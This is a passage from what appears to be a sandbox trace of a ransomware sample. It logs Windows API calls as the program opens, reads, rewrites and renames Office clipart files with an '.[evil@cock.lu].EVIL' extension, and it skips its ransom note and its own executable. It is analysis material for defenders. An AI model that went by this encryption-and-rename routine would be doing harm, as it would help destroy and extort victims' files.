_Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 69 [0140.830] wcscmp (_String1="J0106958.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.830] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0106958.WMF") returned 0x0 [0140.831] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF") returned 0x45 [0140.831] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.832] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x35d8, lpOverlapped=0x0) returned 1 [0140.842] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.842] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.842] _errno () returned 0x84b1160840 [0140.842] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.842] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x35e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x35e0, lpOverlapped=0x0) returned 1 [0140.842] CloseHandle (hObject=0x1a8) returned 1 [0140.843] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.843] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.843] __uncaught_exception () returned 0x84b1160800 [0140.843] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.843] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0106958.wmf.[evil@cock.lu].evil")) returned 1 [0140.844] ??_V@YAXPEAX@Z () returned 0x1 [0140.846] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0106958.WMF", dwFileAttributes=0x200) returned 0 [0140.847] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.847] wcsstr (_Str="J0107024.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.847] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 69 [0140.847] wcscmp (_String1="J0107024.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.847] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107024.WMF") returned 0x0 [0140.847] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF") returned 0x45 [0140.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.849] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbcc, lpOverlapped=0x0) returned 1 [0140.879] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.879] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.879] _errno () returned 0x84b1160840 [0140.879] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.879] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0140.879] CloseHandle (hObject=0x1a8) returned 1 [0140.880] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.880] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.880] __uncaught_exception () returned 0x84b1160800 [0140.880] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.880] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107024.wmf.[evil@cock.lu].evil")) returned 1 [0140.881] ??_V@YAXPEAX@Z () returned 0x1 [0140.884] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107024.WMF", dwFileAttributes=0x200) returned 0 [0140.885] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.885] wcsstr (_Str="J0107026.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.885] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 69 [0140.885] wcscmp (_String1="J0107026.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.885] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107026.WMF") returned 0x0 [0140.885] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF") returned 0x45 [0140.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.887] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1dd0, lpOverlapped=0x0) returned 1 [0140.890] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.890] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.891] _errno () returned 0x84b1160840 [0140.891] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.891] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1de0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1de0, lpOverlapped=0x0) returned 1 [0140.891] CloseHandle (hObject=0x1a8) returned 1 [0140.891] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.891] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.891] __uncaught_exception () returned 0x84b1160800 [0140.891] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.892] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107026.wmf.[evil@cock.lu].evil")) returned 1 [0140.892] ??_V@YAXPEAX@Z () returned 0x1 [0140.896] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107026.WMF", dwFileAttributes=0x200) returned 0 [0140.897] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.897] wcsstr (_Str="J0107042.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.897] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 69 [0140.897] wcscmp (_String1="J0107042.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.897] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107042.WMF") returned 0x0 [0140.897] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF") returned 0x45 [0140.897] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.899] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x2358, lpOverlapped=0x0) returned 1 [0140.917] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.917] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.917] _errno () returned 0x84b1160840 [0140.917] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.917] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x2360, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2360, lpOverlapped=0x0) returned 1 [0140.917] CloseHandle (hObject=0x1a8) returned 1 [0140.917] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.918] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.918] __uncaught_exception () returned 0x84b1160800 [0140.918] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.918] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107042.wmf.[evil@cock.lu].evil")) returned 1 [0140.919] ??_V@YAXPEAX@Z () returned 0x1 [0140.922] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107042.WMF", dwFileAttributes=0x200) returned 0 [0140.922] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.922] wcsstr (_Str="J0107090.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.922] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 69 [0140.922] wcscmp (_String1="J0107090.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.922] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107090.WMF") returned 0x0 [0140.922] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF") returned 0x45 [0140.922] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.924] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3734, lpOverlapped=0x0) returned 1 [0140.927] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.927] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.927] _errno () returned 0x84b1160840 [0140.927] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.927] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x3740, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3740, lpOverlapped=0x0) returned 1 [0140.927] CloseHandle (hObject=0x1a8) returned 1 [0140.927] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.928] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.928] __uncaught_exception () returned 0x84b1160800 [0140.928] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.928] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107090.wmf.[evil@cock.lu].evil")) returned 1 [0140.929] ??_V@YAXPEAX@Z () returned 0x1 [0140.933] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107090.WMF", dwFileAttributes=0x200) returned 0 [0140.933] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.933] wcsstr (_Str="J0107130.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.933] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 69 [0140.933] wcscmp (_String1="J0107130.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.933] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107130.WMF") returned 0x0 [0140.933] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF") returned 0x45 [0140.933] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.935] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x69cc, lpOverlapped=0x0) returned 1 [0140.950] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.950] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.950] _errno () returned 0x84b1160840 [0140.950] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.950] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x69e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x69e0, lpOverlapped=0x0) returned 1 [0140.950] CloseHandle (hObject=0x1a8) returned 1 [0140.950] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.950] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.950] __uncaught_exception () returned 0x84b1160800 [0140.950] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.951] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107130.wmf.[evil@cock.lu].evil")) returned 1 [0140.951] ??_V@YAXPEAX@Z () returned 0x1 [0140.954] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107130.WMF", dwFileAttributes=0x200) returned 0 [0140.954] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.954] wcsstr (_Str="J0107132.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.954] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 69 [0140.954] wcscmp (_String1="J0107132.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.954] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107132.WMF") returned 0x0 [0140.954] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF") returned 0x45 [0140.954] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.956] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbcfc, lpOverlapped=0x0) returned 1 [0140.958] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.958] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.958] _errno () returned 0x84b1160840 [0140.958] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.958] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0xbd00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbd00, lpOverlapped=0x0) returned 1 [0140.959] CloseHandle (hObject=0x1a8) returned 1 [0140.959] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.959] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.959] __uncaught_exception () returned 0x84b1160800 [0140.959] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.959] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107132.wmf.[evil@cock.lu].evil")) returned 1 [0140.960] ??_V@YAXPEAX@Z () returned 0x1 [0140.963] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107132.WMF", dwFileAttributes=0x200) returned 0 [0140.963] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.963] wcsstr (_Str="J0107134.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.963] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 69 [0140.963] wcscmp (_String1="J0107134.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.963] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107134.WMF") returned 0x0 [0140.963] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF") returned 0x45 [0140.963] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.965] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbd04, lpOverlapped=0x0) returned 1 [0140.978] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.978] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.978] _errno () returned 0x84b1160840 [0140.978] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.978] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0xbd20, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbd20, lpOverlapped=0x0) returned 1 [0140.978] CloseHandle (hObject=0x1a8) returned 1 [0140.979] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.979] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.979] __uncaught_exception () returned 0x84b1160800 [0140.979] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.979] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107134.wmf.[evil@cock.lu].evil")) returned 1 [0140.980] ??_V@YAXPEAX@Z () returned 0x1 [0140.982] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107134.WMF", dwFileAttributes=0x200) returned 0 [0140.983] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.983] wcsstr (_Str="J0107138.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.983] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 69 [0140.983] wcscmp (_String1="J0107138.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.983] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107138.WMF") returned 0x0 [0140.983] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF") returned 0x45 [0140.983] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft 